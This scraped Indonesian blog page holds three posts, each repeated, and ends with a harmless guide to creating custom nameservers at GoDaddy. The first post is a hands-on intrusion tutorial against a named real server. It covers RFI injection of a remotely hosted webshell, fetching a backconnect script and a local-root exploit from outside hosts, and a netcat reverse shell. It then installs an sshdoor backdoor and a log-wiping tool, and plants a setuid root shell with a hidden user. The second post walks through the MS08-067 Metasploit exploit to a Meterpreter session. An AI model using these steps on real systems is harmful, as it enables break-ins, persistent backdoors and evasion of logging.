Pada tutor ini, Aq akan mendemonstrasikan gimana get root dari sebuah server.
Dan kebetulan sekali bug nya adalah RFI.
Langsung aja yo.. bigsmile
Peralatan dan perlengkapan.
1. Target --->> http://vrrc.keist.ac.kr/config.php?dir=
2. RFI Injector ( Webshell ) --->> http://prospeedperformance.com/hn.jpg
3. Netcat --->> Untuk backconnect ( google.com )
4. Backconnect.pl --->> http://prospeedperformance.com/backconnect.txt
5. Root Exploit --->>
6. sshdoor --->> http://prospeedperformance.com/ssh.tar.gz
7. Rem root --->> http://125.251.142.142/zboard/local/rem
8. Root shell backdoor
9. Putty --->>
Langsung aja yo, ga pake lama.
## Inject target dengan RFI Injector
http://vrrc.keist.ac.kr/config.php?dir=h...m/hn.jpg??
Seip..
Masok.. bigsmile
Selanjutnya cari direktori yang bisa kita tulisi ( writeable ) daripada pusing mencarinya.
Langsung aja masuk ke /tmp.
Caranya, itu loh di sebelah kanan atas ada kotak Directory.
Masukkan aja /tmp lalu ketik go.
Seip dah.. p
Sekarang kita berada di direktori /tmp. dimana direktori ini udah pasti writeable. sehingga kita bebas mengupload file di direktori ini.
Step selanjutnya adalah upload backconnect.pl ke shell. dalam hal ini, Aq membuat file tersebut ( tidak mengupload or wget , karena ya suka-suka donk.. p
Untuk membuat file, masukkan backconnect.pl di kotak create lalu klik create.
Pada tampilan yang keluar, masukkan backconnect.pl pada kotak yang tersedia. dimana file backconnect.pl….???
Setelah dimasukkan tekan tombol save yang ada diatas. tunggu loading sampe muncul tulisan save.
Karena backconect.pl udah Aq upload, jadi tinggal download ajjah.
Lwp-download http://prospeedperformance.com/backconnect.txt
Berikutnya, kita lakuka backconnect dari shell ke kompi kita. Kenapa Aq memilih backconnect, bukan bind..??
Karena bind terkadang tertutup firewall sehinggs gagal, jadi Aq pilih backconnect ajjah banyak berhasilnya. bigsmile bigsmile bigsmile
Okeh..
Set dulu netcat dalam mode listening, dalam contoh Aq ngeset ke port 6788
nc-vlp 6788
seeipp..
next step, lakukan backconnect dengan script backconnect kita tadi, buka lagi webshell, dan jalankan perintah backconnect.
perl backconnect.txt 222.236.47.23 6788
Seiiippp.
Setelah klik execute, tidak perlu menunggu lama, buka kembali console / cmd kamu ( netcat yang listening tadi lowh ).
Lihat, shell sudah terkoneksi dengan kita, kita sudah mendapatkan akses shell interaktif dengan target kita.
Perhatikan versi kernelnya. Yang mana..??
Ketik ajjah uname –a ntar keluar kernelnya.
Cari tau linux yang di pake doi apa.
cat /etc/issue
misal Linux Debian dengan kernel 2.4.18 tahun 2002.. hahahaiii..
mengetahui tahun penting, karena kernel yang mudah di root adalah tahun 2006 ke bawah, yang keatas masih sulit.. bigsmile
berikutnya, cari exploit yang sesuai di http://tarantula.by.ru/localroot/
naaahh..
itu dia ada, masuk ke direktorinya.
Ada beberapa pilihan exploit, Aq pake kesukaanku aja, brk2
Copy aja link ke file itu, download ke shell.
Lwp-download http://tarantula.by.ru/localroot.2.4.18/brk2
Tunggu download selesai.
Setelah selesai, coba ls –la ( filename ) untuk mengecek file tersebut benar² terdownload or kagak.
Perhatikan, file tersimpan dengan nama brk2.cc
Cek file tersebut apakah benar² terdownload.
ls –la brk2.cc
Wokeh..
Next step, jalankan exploit.
Exploit harus permission executable, caranya chmod 777 brk2.cc, kemudian baru jalankan exploitnya.
chmod 777 brk2.cc
./brk2.cc
su
id
Tunggu beberapa saat sampai menunjukkan id kita adalah root, kadang mencapai waktu yang lama.
Sabar ya, pipis dulu biar gak bocor ntar kalo dapet root.
Beberapa saat setelah menunggu, akhirnya..
Horeeeeeeeeeeeeeeeeee…. Dapet root.. ( guling….guling…guling…guling… )
Next..
Install backdoor, backdoor di gunakan sebagai pintu kita masuk lagi nanti, kita pakai sshdoor
Install sshdoor :
Download dulu : lwp-download http://prospeedperformance.com/ssh.tar.gz
extract file : tar –zxf ssh.tar.gz
go dir : cd sshdoor
set perm executable : chmod 777 * -R
install : ./install ( password port ) -->> ./install jc 9657 <<-- install sshdoor dengan password, dengan bind ke port 9657. Tunggu sampai selesai. Seiiipppp… Selese sudah install sshdoor, berikutnya kita check apakah port 9657 ( yang kita bind dengan sshdoor tadi lowh ) telnet ke target dengan port 9657 telnet 143.248.249.224 9657 connected, tandanya port 9657 terbuka. Berarti sshdoor sukses terinstall. Dari step ini, kita sudah menanam backdoor di server target. Sekarang kita konek ke server target dengan ssh. ssh 143.248.249.224 -p 9657 -l root untuk pertama kali login `kan dimintai pengaktifan fingerprint rsa, yes ajjah. Ketika dimintai password, masukkan password kita tadi, yaitu jc Seiipp.. Untuk pengguna windus pake putty Next, rem root.. ini agar kegiatan kita tidak di log dan sekaligus hidden access. Installasi goto /usr/bin : cd /usr/bin download : lwp-download http://125.251.142.142/zboard/local/rem set perm : chmod 755 rem run : rem root pilih mode : a seipp.. perhatikan, ada satu langkah mv rem.txt rem langkah itu dilakukan karena lwp-download menyimpan file dalam nama rem.txt. jadi kita rename manjadi rem saja. Yap.. Selese, but gimana kalo ternyata kita tidak bisa ngebind port pas install sshdoor..?? Apakah kita akan meninggalkan server yang berhasil kita root begitu saja..?? Tidak Ada alternative lain untuk backdooring root. Langsung ajjah kita buat root backdoornya. touch rsh.c echo ‘int main() { ‘ > rsh.c
echo ‘setregid(0,0);’ >> rsh.c
echo ‘setreuid(0,0);’ >> rsh.c
echo ‘setgroups(0,0);’ >> rsh.c
echo ‘system(“/bin/sh”);’ >> rsh.c
echo ‘}’ >> rsh.c
echo “ >> rsh.c
gcc -o /usr/bin/rsh rsh.c
rm -f rsh.c
chmod 4755 /usr/bin/rsh
chown root:root /usr/bin/rsh
next adduser dengan shellnya /usr/bin/rsh
useradd www -d /root -g 0 -G 0 -s /usr/bin/rsh
passwd www
selese.. p
mari kita coba ssh ke port 22 dengan user www
karena kita tidak ngebind ke port, berarti kita menggunakan ssh nya dia secara default, yaitu ke port 22.
Langsung ajjah login.
Baca Selengkapnya..
Dan kebetulan sekali bug nya adalah RFI.
Langsung aja yo.. bigsmile
Peralatan dan perlengkapan.
1. Target --->> http://vrrc.keist.ac.kr/config.php?dir=
2. RFI Injector ( Webshell ) --->> http://prospeedperformance.com/hn.jpg
3. Netcat --->> Untuk backconnect ( google.com )
4. Backconnect.pl --->> http://prospeedperformance.com/backconnect.txt
5. Root Exploit --->>
6. sshdoor --->> http://prospeedperformance.com/ssh.tar.gz
7. Rem root --->> http://125.251.142.142/zboard/local/rem
8. Root shell backdoor
9. Putty --->>
Langsung aja yo, ga pake lama.
## Inject target dengan RFI Injector
http://vrrc.keist.ac.kr/config.php?dir=h...m/hn.jpg??
Seip..
Masok.. bigsmile
Selanjutnya cari direktori yang bisa kita tulisi ( writeable ) daripada pusing mencarinya.
Langsung aja masuk ke /tmp.
Caranya, itu loh di sebelah kanan atas ada kotak Directory.
Masukkan aja /tmp lalu ketik go.
Seip dah.. p
Sekarang kita berada di direktori /tmp. dimana direktori ini udah pasti writeable. sehingga kita bebas mengupload file di direktori ini.
Step selanjutnya adalah upload backconnect.pl ke shell. dalam hal ini, Aq membuat file tersebut ( tidak mengupload or wget , karena ya suka-suka donk.. p
Untuk membuat file, masukkan backconnect.pl di kotak create lalu klik create.
Pada tampilan yang keluar, masukkan backconnect.pl pada kotak yang tersedia. dimana file backconnect.pl….???
Setelah dimasukkan tekan tombol save yang ada diatas. tunggu loading sampe muncul tulisan save.
Karena backconect.pl udah Aq upload, jadi tinggal download ajjah.
Lwp-download http://prospeedperformance.com/backconnect.txt
Berikutnya, kita lakuka backconnect dari shell ke kompi kita. Kenapa Aq memilih backconnect, bukan bind..??
Karena bind terkadang tertutup firewall sehinggs gagal, jadi Aq pilih backconnect ajjah banyak berhasilnya. bigsmile bigsmile bigsmile
Okeh..
Set dulu netcat dalam mode listening, dalam contoh Aq ngeset ke port 6788
nc-vlp 6788
seeipp..
next step, lakukan backconnect dengan script backconnect kita tadi, buka lagi webshell, dan jalankan perintah backconnect.
perl backconnect.txt 222.236.47.23 6788
Seiiippp.
Setelah klik execute, tidak perlu menunggu lama, buka kembali console / cmd kamu ( netcat yang listening tadi lowh ).
Lihat, shell sudah terkoneksi dengan kita, kita sudah mendapatkan akses shell interaktif dengan target kita.
Perhatikan versi kernelnya. Yang mana..??
Ketik ajjah uname –a ntar keluar kernelnya.
Cari tau linux yang di pake doi apa.
cat /etc/issue
misal Linux Debian dengan kernel 2.4.18 tahun 2002.. hahahaiii..
mengetahui tahun penting, karena kernel yang mudah di root adalah tahun 2006 ke bawah, yang keatas masih sulit.. bigsmile
berikutnya, cari exploit yang sesuai di http://tarantula.by.ru/localroot/
naaahh..
itu dia ada, masuk ke direktorinya.
Ada beberapa pilihan exploit, Aq pake kesukaanku aja, brk2
Copy aja link ke file itu, download ke shell.
Lwp-download http://tarantula.by.ru/localroot.2.4.18/brk2
Tunggu download selesai.
Setelah selesai, coba ls –la ( filename ) untuk mengecek file tersebut benar² terdownload or kagak.
Perhatikan, file tersimpan dengan nama brk2.cc
Cek file tersebut apakah benar² terdownload.
ls –la brk2.cc
Wokeh..
Next step, jalankan exploit.
Exploit harus permission executable, caranya chmod 777 brk2.cc, kemudian baru jalankan exploitnya.
chmod 777 brk2.cc
./brk2.cc
su
id
Tunggu beberapa saat sampai menunjukkan id kita adalah root, kadang mencapai waktu yang lama.
Sabar ya, pipis dulu biar gak bocor ntar kalo dapet root.
Beberapa saat setelah menunggu, akhirnya..
Horeeeeeeeeeeeeeeeeee…. Dapet root.. ( guling….guling…guling…guling… )
Next..
Install backdoor, backdoor di gunakan sebagai pintu kita masuk lagi nanti, kita pakai sshdoor
Install sshdoor :
Download dulu : lwp-download http://prospeedperformance.com/ssh.tar.gz
extract file : tar –zxf ssh.tar.gz
go dir : cd sshdoor
set perm executable : chmod 777 * -R
install : ./install ( password port ) -->> ./install jc 9657 <<-- install sshdoor dengan password, dengan bind ke port 9657. Tunggu sampai selesai. Seiiipppp… Selese sudah install sshdoor, berikutnya kita check apakah port 9657 ( yang kita bind dengan sshdoor tadi lowh ) telnet ke target dengan port 9657 telnet 143.248.249.224 9657 connected, tandanya port 9657 terbuka. Berarti sshdoor sukses terinstall. Dari step ini, kita sudah menanam backdoor di server target. Sekarang kita konek ke server target dengan ssh. ssh 143.248.249.224 -p 9657 -l root untuk pertama kali login `kan dimintai pengaktifan fingerprint rsa, yes ajjah. Ketika dimintai password, masukkan password kita tadi, yaitu jc Seiipp.. Untuk pengguna windus pake putty Next, rem root.. ini agar kegiatan kita tidak di log dan sekaligus hidden access. Installasi goto /usr/bin : cd /usr/bin download : lwp-download http://125.251.142.142/zboard/local/rem set perm : chmod 755 rem run : rem root pilih mode : a seipp.. perhatikan, ada satu langkah mv rem.txt rem langkah itu dilakukan karena lwp-download menyimpan file dalam nama rem.txt. jadi kita rename manjadi rem saja. Yap.. Selese, but gimana kalo ternyata kita tidak bisa ngebind port pas install sshdoor..?? Apakah kita akan meninggalkan server yang berhasil kita root begitu saja..?? Tidak Ada alternative lain untuk backdooring root. Langsung ajjah kita buat root backdoornya. touch rsh.c echo ‘int main() { ‘ > rsh.c
echo ‘setregid(0,0);’ >> rsh.c
echo ‘setreuid(0,0);’ >> rsh.c
echo ‘setgroups(0,0);’ >> rsh.c
echo ‘system(“/bin/sh”);’ >> rsh.c
echo ‘}’ >> rsh.c
echo “ >> rsh.c
gcc -o /usr/bin/rsh rsh.c
rm -f rsh.c
chmod 4755 /usr/bin/rsh
chown root:root /usr/bin/rsh
next adduser dengan shellnya /usr/bin/rsh
useradd www -d /root -g 0 -G 0 -s /usr/bin/rsh
passwd www
selese.. p
mari kita coba ssh ke port 22 dengan user www
karena kita tidak ngebind ke port, berarti kita menggunakan ssh nya dia secara default, yaitu ke port 22.
Langsung ajjah login.
Baca Selengkapnya..
0
komentar
Seperti yang telah kita ketahui, metasploit framework adalah sebuah penetration tool yang cukup powerfull dalam melakukan sebuah penestrasi ke sebuah system. Dan ini bisa menjadi sebuah pedang yang mempunyai 2 sisi, digunakan sebagai analyst system tool atau digunakan untuk melakukan kegiatan negatif yang berakhir pada attacking. Melalui artikel ini, saya memberikan salah satu contoh penggunaan MF dalam melakukan sesi gaining access.
Kali ini kita akan menggunakan modul exploit yang akan mem-parsing kelemahan kode pemrograman pada NetAPI32.dll, yang terdapat dalam layanan services bawaan windows. Ini berkaitan juga dengan services NetBIOS (Lagi-lagi netbiosnya windows, setelah bug RPC yang kian menjamur beberapa waktu yang lalu). So, let’s use linux friends.. p
Modul ini mempunyai kemampuan mem-bypass DEP( Data Execution Prevention )dalam system operasi Wind*ws. DEP adalah salah satu services di wind*ws yang mempunyai fungsi untuk membantu mencegah/membatasi dampak yang terjadi pada saat ada virus atau sebuah ancaman keamanan [threat security] sedang aktif.
Untuk DEP ini, anda bisa melihat aktif apa tidaknya, pada bagian “Properties” di My Computer, lalu pilih pada bagian “Advanced” dan lihat pada bar “Data Execution Prevention”.
Modul ini bekerja, jika target adalah Wind*ws XP Operatin System (s/d WinXP SP 3), namun juga bisa pada target ber-OS Wind*s 2003, asalkan DEP-nya non aktif.
Ok, langsung kelangkah-nya..
Pertama anda siapkan metasploit dengan update terbaru
(cara ini berlaku untuk minimal versi framework 3.2-testing.5773)
msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
lalu anda pilih modul exlpoitnya, seperti berikut :
msf > use windows/smb/ms08_067_netapi
untuk petunjuk opsi/pilhan yang bisa anda gunakan anda bisa lakukan :
msf exploit(ms08_067_netapi) > show options
lalu anda set target
msf exploit(ms08_067_netapi) > set RHOST 192.168.54.xx
RHOST => 192.168.54.xx
kemudian anda set PAYLOAD
msf exploit(ms08_067_netapi) > set PAYLOAD Generic/Shell_Bind_TCP
Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi. Untuk kali ini, mudahnya kita pilih Generic/Shell_Bind_TCP, maksudnya kita akan mengambil alih Shell Bind (kalau di lingkungan windows dikenal sebagai Command Prompt) dari target hacking kita.
Untuk setting yang lain, karena kita masih belajar maka biarkan saja default adanya.
kemudian tinggal jalankan EXPLOIT-nya :
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target…
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (73227 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.54.1:51707 -> 192.168.54.xx:4444)
Dan jika berhasil maka anada akan disuguhi sebuah window baru berisi sebuah layar Command Prompt dari komputer target dan anda mempunyai level administrator.
Oh ya, cara diatas memang sengaja saya gunakan MF yang versi console, sebenarnya ada versi GUI-nya dan juga yang WEB based.
Saya menggunakan console karena saya tertarik dengan quote dari distro linux xcode : hacker tidak membutuhkan tampilan yang memukau p
Namun, keputusan akhir terserah pada anda.
Baca Selengkapnya..
Kali ini kita akan menggunakan modul exploit yang akan mem-parsing kelemahan kode pemrograman pada NetAPI32.dll, yang terdapat dalam layanan services bawaan windows. Ini berkaitan juga dengan services NetBIOS (Lagi-lagi netbiosnya windows, setelah bug RPC yang kian menjamur beberapa waktu yang lalu). So, let’s use linux friends.. p
Modul ini mempunyai kemampuan mem-bypass DEP( Data Execution Prevention )dalam system operasi Wind*ws. DEP adalah salah satu services di wind*ws yang mempunyai fungsi untuk membantu mencegah/membatasi dampak yang terjadi pada saat ada virus atau sebuah ancaman keamanan [threat security] sedang aktif.
Untuk DEP ini, anda bisa melihat aktif apa tidaknya, pada bagian “Properties” di My Computer, lalu pilih pada bagian “Advanced” dan lihat pada bar “Data Execution Prevention”.
Modul ini bekerja, jika target adalah Wind*ws XP Operatin System (s/d WinXP SP 3), namun juga bisa pada target ber-OS Wind*s 2003, asalkan DEP-nya non aktif.
Ok, langsung kelangkah-nya..
Pertama anda siapkan metasploit dengan update terbaru
(cara ini berlaku untuk minimal versi framework 3.2-testing.5773)
msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
lalu anda pilih modul exlpoitnya, seperti berikut :
msf > use windows/smb/ms08_067_netapi
untuk petunjuk opsi/pilhan yang bisa anda gunakan anda bisa lakukan :
msf exploit(ms08_067_netapi) > show options
lalu anda set target
msf exploit(ms08_067_netapi) > set RHOST 192.168.54.xx
RHOST => 192.168.54.xx
kemudian anda set PAYLOAD
msf exploit(ms08_067_netapi) > set PAYLOAD Generic/Shell_Bind_TCP
Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi. Untuk kali ini, mudahnya kita pilih Generic/Shell_Bind_TCP, maksudnya kita akan mengambil alih Shell Bind (kalau di lingkungan windows dikenal sebagai Command Prompt) dari target hacking kita.
Untuk setting yang lain, karena kita masih belajar maka biarkan saja default adanya.
kemudian tinggal jalankan EXPLOIT-nya :
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target…
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (73227 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.54.1:51707 -> 192.168.54.xx:4444)
Dan jika berhasil maka anada akan disuguhi sebuah window baru berisi sebuah layar Command Prompt dari komputer target dan anda mempunyai level administrator.
Oh ya, cara diatas memang sengaja saya gunakan MF yang versi console, sebenarnya ada versi GUI-nya dan juga yang WEB based.
Saya menggunakan console karena saya tertarik dengan quote dari distro linux xcode : hacker tidak membutuhkan tampilan yang memukau p
Namun, keputusan akhir terserah pada anda.
Baca Selengkapnya..
Ketika menyewa sebuah webhosting, kita biasanya diberi informasi account dan informasi nameserver dengan format NS1.NAMAHOSTING.COM dan NS2.NAMAHOSTING.COM. Nama server tersebut nantinya akan bisa dilihat publik ketika melakukan Whois ke domain kita sehingga orang lain akan tahu dimana kita menyewa hosting.Sebenarnya kita bisa membuat nameserver sendiri dengan format NS1.DOMAINKITA.COM dan NS2.DOMAINKITA.COM. Untuk dapat membuat nameserver sendiri syaratnya adalah kita harus punya akses ke control panel domain yang memungkinkan mengedit DNS Zone. Beberapa registrar domain yang memungkinkan kita membuat nameserver sendiri (tanpa biaya tambahan) diantaranya Godaddy.com, Name.com, Dynadot.com
Berikut tutorial untuk membuat nameserver di Godaddy.com
- Login ke account di Godaddy.com
- Masuk ke domain management dengan mengklik menu My Domain
- Klik salah satu domain yang akan dibuat nameservernya
- Scroll ke bawah, di situ tertera tertera Host Summary (add), klik pada link (add)
- Pada kotak hostname isikan NS1, pada kotak Host IP1 isikan no IP untuk NS1
- Ulangi sekali lagi untuk NS2, pada kotak Host IP1 isikan no IP untuk NS2
- Klik OK jika sudah selesai. Nameserver akan aktif dalam waktu paling lama 48 jam.
NB:
Untuk mendapatkan no IP. lakukan ping ke NS1.NAMAHOSTING.COM dan NS2.NAMAHOSTING.COM (sesuai yang diberikan pihak webhosting), caranya ketikkan di Start -> Run ping ns1.namahosting.com -t dan tekan Enter, demikian juga untuk NS2-nya.
Trik ini hanya untuk merubah nameserver, dimana orang lain masih tetap dapat melihat dimana kita menyewa hosting dengan melakukan trace-route.
Baca Selengkapnya..
Berikut tutorial untuk membuat nameserver di Godaddy.com
- Login ke account di Godaddy.com
- Masuk ke domain management dengan mengklik menu My Domain
- Klik salah satu domain yang akan dibuat nameservernya
- Scroll ke bawah, di situ tertera tertera Host Summary (add), klik pada link (add)
- Pada kotak hostname isikan NS1, pada kotak Host IP1 isikan no IP untuk NS1
- Ulangi sekali lagi untuk NS2, pada kotak Host IP1 isikan no IP untuk NS2
- Klik OK jika sudah selesai. Nameserver akan aktif dalam waktu paling lama 48 jam.
NB:
Untuk mendapatkan no IP. lakukan ping ke NS1.NAMAHOSTING.COM dan NS2.NAMAHOSTING.COM (sesuai yang diberikan pihak webhosting), caranya ketikkan di Start -> Run ping ns1.namahosting.com -t dan tekan Enter, demikian juga untuk NS2-nya.
Trik ini hanya untuk merubah nameserver, dimana orang lain masih tetap dapat melihat dimana kita menyewa hosting dengan melakukan trace-route.
Baca Selengkapnya..
Langganan:
Postingan (Atom)